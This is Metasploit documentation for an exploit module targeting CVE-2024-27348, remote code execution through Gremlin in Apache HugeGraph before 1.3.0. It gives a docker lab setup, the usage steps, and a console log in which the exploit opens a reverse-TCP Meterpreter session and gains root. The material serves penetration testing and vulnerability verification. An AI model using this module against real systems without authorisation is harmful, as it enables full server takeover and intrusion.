metasploit-gs/documentation/modules/exploit/linux/http/apache_hugegraph_gremlin_rce.md

Vulnerable Application

This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve RCE through Gremlin, resulting in complete control over the server

Setup

To install a vulnerable instance via docker run the following command:

docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0

Verification Steps

1. Start msfconsole
2. Do: use exploit/linux/http/apache_hugegraph_gremlin_rce
3. Set the RHOST and LHOST options
4. Run the module
5. Receive a Meterpreter session as the root user.

Scenarios

Apache HugeGraph 1.0.0 docker instance

msf exploit(linux/http/apache_hugegraph_gremlin_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(linux/http/apache_hugegraph_gremlin_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(linux/http/apache_hugegraph_gremlin_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Apache HugeGraph version detected: 1.0.0
[*] 127.0.0.1:9191 - Executing Automatic Target for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.1:53803) at 2024-07-29 13:59:20 -0700

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 11.4 (Linux 6.6.32-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >